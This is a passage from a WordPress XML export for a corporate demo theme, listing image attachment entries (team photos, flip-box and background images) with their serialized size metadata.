		<link>http://wpdemo.archiwp.com/maxbizz-corporate/about-us/team2/</link>
		<pubDate>Tue, 08 Sep 2020 04:36:20 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/team2.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>525</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 04:36:20]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 04:36:20]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[team2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>487</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/team2.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/team2.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:750;s:6:"height";i:833;s:4:"file";s:19:"2020/09/team2.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:19:"team2-1-270x300.jpg";s:5:"width";i:270;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:19:"team2-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:19:"team2-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:19:"team2-1-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:19:"team2-1-750x600.jpg";s:5:"width";i:750;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>team3</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/about-us/team3/</link>
		<pubDate>Tue, 08 Sep 2020 04:36:21 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/team3.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>526</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 04:36:21]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 04:36:21]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[team3]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>487</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/team3.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/team3.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:750;s:6:"height";i:833;s:4:"file";s:19:"2020/09/team3.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:19:"team3-1-270x300.jpg";s:5:"width";i:270;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:19:"team3-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:19:"team3-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:19:"team3-1-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:19:"team3-1-750x600.jpg";s:5:"width";i:750;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>team4</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/about-us/team4/</link>
		<pubDate>Tue, 08 Sep 2020 04:36:23 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/team4.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>527</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 04:36:23]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 04:36:23]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[team4]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>487</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/team4.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/team4.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:750;s:6:"height";i:833;s:4:"file";s:19:"2020/09/team4.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:19:"team4-1-270x300.jpg";s:5:"width";i:270;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:19:"team4-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:19:"team4-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:19:"team4-1-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:19:"team4-1-750x600.jpg";s:5:"width";i:750;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>pheader-value</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/our-core-values/pheader-value/</link>
		<pubDate>Tue, 08 Sep 2020 04:49:47 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/pheader-value.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>531</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 04:49:47]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 04:49:47]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[pheader-value]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>529</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/pheader-value.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/pheader-value.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:400;s:4:"file";s:27:"2020/09/pheader-value.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:26:"pheader-value-1-300x63.jpg";s:5:"width";i:300;s:6:"height";i:63;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:28:"pheader-value-1-1024x213.jpg";s:5:"width";i:1024;s:6:"height";i:213;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:27:"pheader-value-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:27:"pheader-value-1-768x160.jpg";s:5:"width";i:768;s:6:"height";i:160;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:28:"pheader-value-1-1536x320.jpg";s:5:"width";i:1536;s:6:"height";i:320;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:27:"pheader-value-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:27:"pheader-value-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:28:"pheader-value-1-1200x400.jpg";s:5:"width";i:1200;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:28:"pheader-value-1-1200x400.jpg";s:5:"width";i:1200;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>flip-box1</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/our-core-values/flip-box1/</link>
		<pubDate>Tue, 08 Sep 2020 07:02:23 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/flip-box1.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>533</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 07:02:23]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 07:02:23]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[flip-box1]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>529</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/flip-box1.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/flip-box1.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:750;s:6:"height";i:649;s:4:"file";s:23:"2020/09/flip-box1.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:23:"flip-box1-1-300x260.jpg";s:5:"width";i:300;s:6:"height";i:260;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:23:"flip-box1-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:23:"flip-box1-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:23:"flip-box1-1-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:23:"flip-box1-1-750x600.jpg";s:5:"width";i:750;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>flip-box2</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/our-core-values/flip-box2/</link>
		<pubDate>Tue, 08 Sep 2020 07:02:24 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/flip-box2.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>534</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 07:02:24]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 07:02:24]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[flip-box2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>529</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/flip-box2.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/flip-box2.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:750;s:6:"height";i:649;s:4:"file";s:23:"2020/09/flip-box2.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:23:"flip-box2-1-300x260.jpg";s:5:"width";i:300;s:6:"height";i:260;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:23:"flip-box2-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:23:"flip-box2-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:23:"flip-box2-1-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:23:"flip-box2-1-750x600.jpg";s:5:"width";i:750;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>flip-box3</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/our-core-values/flip-box3/</link>
		<pubDate>Tue, 08 Sep 2020 07:02:25 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/flip-box3.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>535</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 07:02:25]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 07:02:25]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[flip-box3]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>529</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/flip-box3.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/flip-box3.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:750;s:6:"height";i:649;s:4:"file";s:23:"2020/09/flip-box3.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:23:"flip-box3-1-300x260.jpg";s:5:"width";i:300;s:6:"height";i:260;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:23:"flip-box3-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:23:"flip-box3-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:23:"flip-box3-1-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:23:"flip-box3-1-750x600.jpg";s:5:"width";i:750;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>bg1-value</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/our-core-values/bg1-value/</link>
		<pubDate>Tue, 08 Sep 2020 07:17:14 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/bg1-value.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>540</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 07:17:14]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 07:17:14]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[bg1-value]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>529</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/bg1-value.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/bg1-value.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:408;s:4:"file";s:23:"2020/09/bg1-value.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:22:"bg1-value-1-300x64.jpg";s:5:"width";i:300;s:6:"height";i:64;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:24:"bg1-value-1-1024x218.jpg";s:5:"width";i:1024;s:6:"height";i:218;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:23:"bg1-value-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:23:"bg1-value-1-768x163.jpg";s:5:"width";i:768;s:6:"height";i:163;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:24:"bg1-value-1-1536x326.jpg";s:5:"width";i:1536;s:6:"height";i:326;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:23:"bg1-value-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:23:"bg1-value-1-600x408.jpg";s:5:"width";i:600;s:6:"height";i:408;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:24:"bg1-value-1-1200x408.jpg";s:5:"width";i:1200;s:6:"height";i:408;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:24:"bg1-value-1-1200x408.jpg";s:5:"width";i:1200;s:6:"height";i:408;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>image1-value</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/our-core-values/image1-value/</link>
		<pubDate>Tue, 08 Sep 2020 07:33:37 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/image1-value.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>542</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 07:33:37]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 07:33:37]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[image1-value]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>529</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/image1-value.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/image1-value.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:750;s:6:"height";i:656;s:4:"file";s:26:"2020/09/image1-value.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:26:"image1-value-1-300x262.jpg";s:5:"width";i:300;s:6:"height";i:262;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:26:"image1-value-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:26:"image1-value-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:26:"image1-value-1-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:26:"image1-value-1-750x600.jpg";s:5:"width";i:750;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>bg2-value</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/our-core-values/bg2-value/</link>
		<pubDate>Tue, 08 Sep 2020 08:26:52 +0000</pubDate>
